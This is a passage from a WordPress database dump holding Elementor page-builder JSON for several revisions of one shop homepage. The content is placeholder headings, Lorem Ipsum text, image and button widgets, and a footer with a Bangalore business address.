0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\"},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(7933,1410,'_elementor_page_assets','a:0:{}'),(7935,1411,'_elementor_edit_mode','builder'),(7936,1411,'_elementor_template_type','wp-page'),(7937,1411,'_elementor_version','3.7.6'),(7938,1411,'_wp_page_template','elementor_canvas'),(7939,1411,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\"},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(7940,1411,'_elementor_page_assets','a:0:{}'),(7942,1412,'_elementor_edit_mode','builder'),(7943,1412,'_elementor_template_type','wp-page'),(7944,1412,'_elementor_version','3.7.6'),(7945,1412,'_wp_page_template','elementor_canvas'),(7946,1412,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 